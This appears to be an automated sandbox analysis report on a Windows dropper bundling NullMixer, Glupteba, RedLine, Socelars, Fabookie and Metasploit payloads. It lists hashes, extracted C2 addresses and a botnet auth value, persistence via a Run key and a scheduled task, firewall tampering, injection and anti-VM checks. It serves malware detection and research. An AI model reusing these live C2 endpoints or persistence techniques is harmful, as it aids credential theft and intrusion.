fabookie | 6ed51ee33a2ee2f7a63e23c9fb7086879feb2ba26f203885a44d809b8452a464

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23/12/2024, 20:19 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe
Size

10.6MB
MD5

2d31d4fbad1650ec69c899a5417de3dd
SHA1

621ba6e8907e372798440d711126f0b0a0d8ce2f
SHA256

65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e
SHA512

ac21c3aac43864449e0c135e9466bd368fe16131ba9bd54e754c22410d2b325f2cc525c33509c7fbab5d480d36833aa3bb08d470dec37444fbad5383e362c361
SSDEEP

196608:xYLUCgA7XFU7WhMld/UnPejgM4YdJUB7vLzaDBuCUfvpQJfB/0Do05kWgX0q:x0dgkXFU7zCnPUgM4WUkBqRQ/BTkq

Malware Config

Extracted

Family

socelars

http://www.ecgbg.com/

Extracted

Family

redline

Botnet

user01new

49.12.219.50:4846

Attributes

auth_value
fcca1ed5af8553053dc74a4c6a9ce601

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023cc6-88.dat	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Fabookie family
fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba
Glupteba family
glupteba

Glupteba payload 15 IoCs

resource	yara_rule
behavioral2/memory/1108-191-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/264-197-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-199-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-205-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-206-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-207-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-208-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-209-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-210-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-211-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-212-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-213-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-214-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-215-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba
behavioral2/memory/2352-216-0x0000000000400000-0x00000000023CF000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
Nullmixer family
nullmixer
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Privateloader family
privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/3964-145-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Redline family
redline
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars
Socelars family
socelars

Socelars payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023ccd-84.dat	family_socelars

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1328	powershell.exe
2980	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2676	netsh.exe

ASPack v2.12-2.42 3 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x0008000000023cbb-52.dat	aspack_v212_v242
behavioral2/files/0x0007000000023cc0-51.dat	aspack_v212_v242
behavioral2/files/0x0007000000023cc2-58.dat	aspack_v212_v242

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	Tue20c0a313caa25872.exe

Executes dropped EXE 11 IoCs

pid	Process
3420	setup_install.exe
2456	Tue20acc89cbd449e95d.exe
4548	Tue20cceb49d9a7.exe
1396	Tue20c64a1a28623ee7.exe
1108	Tue20cb62eb1a4cb3a01.exe
4232	Tue20c0a313caa25872.exe
2252	Tue20c0a313caa25872.exe
3964	Tue20acc89cbd449e95d.exe
264	Tue20cb62eb1a4cb3a01.exe
2352	csrss.exe
4928	injector.exe

Loads dropped DLL 5 IoCs

pid	Process
3420	setup_install.exe
3420	setup_install.exe
3420	setup_install.exe
3420	setup_install.exe
3420	setup_install.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DawnPaper = "\"C:\\Windows\\rss\\csrss.exe\""	Tue20cb62eb1a4cb3a01.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2456 set thread context of 3964	2456	Tue20acc89cbd449e95d.exe	110

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	Tue20cb62eb1a4cb3a01.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	Tue20cb62eb1a4cb3a01.exe
File created	C:\Windows\rss\csrss.exe	Tue20cb62eb1a4cb3a01.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2008	1108	WerFault.exe	107
2248	264	WerFault.exe	116

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tue20cb62eb1a4cb3a01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tue20acc89cbd449e95d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tue20c0a313caa25872.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csrss.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tue20cceb49d9a7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tue20acc89cbd449e95d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tue20c0a313caa25872.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tue20cb62eb1a4cb3a01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	csrss.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1696	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1328	powershell.exe
2980	powershell.exe
1328	powershell.exe
2980	powershell.exe
1108	Tue20cb62eb1a4cb3a01.exe
1108	Tue20cb62eb1a4cb3a01.exe
264	Tue20cb62eb1a4cb3a01.exe
264	Tue20cb62eb1a4cb3a01.exe
264	Tue20cb62eb1a4cb3a01.exe
264	Tue20cb62eb1a4cb3a01.exe
264	Tue20cb62eb1a4cb3a01.exe
264	Tue20cb62eb1a4cb3a01.exe
264	Tue20cb62eb1a4cb3a01.exe
264	Tue20cb62eb1a4cb3a01.exe
264	Tue20cb62eb1a4cb3a01.exe
264	Tue20cb62eb1a4cb3a01.exe
2352	csrss.exe
2352	csrss.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1328	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	1396	Tue20c64a1a28623ee7.exe
Token: SeDebugPrivilege	1108	Tue20cb62eb1a4cb3a01.exe
Token: SeImpersonatePrivilege	1108	Tue20cb62eb1a4cb3a01.exe
Token: SeSystemEnvironmentPrivilege	2352	csrss.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 3420	2340	65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe	83
PID 2340 wrote to memory of 3420	2340	65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe	83
PID 2340 wrote to memory of 3420	2340	65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe	83
PID 3420 wrote to memory of 2240	3420	setup_install.exe	86
PID 3420 wrote to memory of 2240	3420	setup_install.exe	86
PID 3420 wrote to memory of 2240	3420	setup_install.exe	86
PID 3420 wrote to memory of 1080	3420	setup_install.exe	87
PID 3420 wrote to memory of 1080	3420	setup_install.exe	87
PID 3420 wrote to memory of 1080	3420	setup_install.exe	87
PID 2240 wrote to memory of 1328	2240	cmd.exe	88
PID 2240 wrote to memory of 1328	2240	cmd.exe	88
PID 2240 wrote to memory of 1328	2240	cmd.exe	88
PID 1080 wrote to memory of 2980	1080	cmd.exe	89
PID 1080 wrote to memory of 2980	1080	cmd.exe	89
PID 1080 wrote to memory of 2980	1080	cmd.exe	89
PID 3420 wrote to memory of 1540	3420	setup_install.exe	90
PID 3420 wrote to memory of 1540	3420	setup_install.exe	90
PID 3420 wrote to memory of 1540	3420	setup_install.exe	90
PID 3420 wrote to memory of 3272	3420	setup_install.exe	91
PID 3420 wrote to memory of 3272	3420	setup_install.exe	91
PID 3420 wrote to memory of 3272	3420	setup_install.exe	91
PID 3420 wrote to memory of 1548	3420	setup_install.exe	92
PID 3420 wrote to memory of 1548	3420	setup_install.exe	92
PID 3420 wrote to memory of 1548	3420	setup_install.exe	92
PID 3420 wrote to memory of 2320	3420	setup_install.exe	93
PID 3420 wrote to memory of 2320	3420	setup_install.exe	93
PID 3420 wrote to memory of 2320	3420	setup_install.exe	93
PID 3420 wrote to memory of 4672	3420	setup_install.exe	94
PID 3420 wrote to memory of 4672	3420	setup_install.exe	94
PID 3420 wrote to memory of 4672	3420	setup_install.exe	94
PID 3420 wrote to memory of 764	3420	setup_install.exe	95
PID 3420 wrote to memory of 764	3420	setup_install.exe	95
PID 3420 wrote to memory of 764	3420	setup_install.exe	95
PID 3420 wrote to memory of 3680	3420	setup_install.exe	96
PID 3420 wrote to memory of 3680	3420	setup_install.exe	96
PID 3420 wrote to memory of 3680	3420	setup_install.exe	96
PID 3420 wrote to memory of 3168	3420	setup_install.exe	97
PID 3420 wrote to memory of 3168	3420	setup_install.exe	97
PID 3420 wrote to memory of 3168	3420	setup_install.exe	97
PID 3420 wrote to memory of 3084	3420	setup_install.exe	98
PID 3420 wrote to memory of 3084	3420	setup_install.exe	98
PID 3420 wrote to memory of 3084	3420	setup_install.exe	98
PID 3420 wrote to memory of 1092	3420	setup_install.exe	99
PID 3420 wrote to memory of 1092	3420	setup_install.exe	99
PID 3420 wrote to memory of 1092	3420	setup_install.exe	99
PID 3420 wrote to memory of 4312	3420	setup_install.exe	100
PID 3420 wrote to memory of 4312	3420	setup_install.exe	100
PID 3420 wrote to memory of 4312	3420	setup_install.exe	100
PID 3420 wrote to memory of 3428	3420	setup_install.exe	101
PID 3420 wrote to memory of 3428	3420	setup_install.exe	101
PID 3420 wrote to memory of 3428	3420	setup_install.exe	101
PID 3420 wrote to memory of 1356	3420	setup_install.exe	102
PID 3420 wrote to memory of 1356	3420	setup_install.exe	102
PID 3420 wrote to memory of 1356	3420	setup_install.exe	102
PID 3420 wrote to memory of 3008	3420	setup_install.exe	103
PID 3420 wrote to memory of 3008	3420	setup_install.exe	103
PID 3420 wrote to memory of 3008	3420	setup_install.exe	103
PID 3420 wrote to memory of 2544	3420	setup_install.exe	104
PID 3420 wrote to memory of 2544	3420	setup_install.exe	104
PID 3420 wrote to memory of 2544	3420	setup_install.exe	104
PID 1540 wrote to memory of 2456	1540	cmd.exe	105
PID 1540 wrote to memory of 2456	1540	cmd.exe	105
PID 1540 wrote to memory of 2456	1540	cmd.exe	105
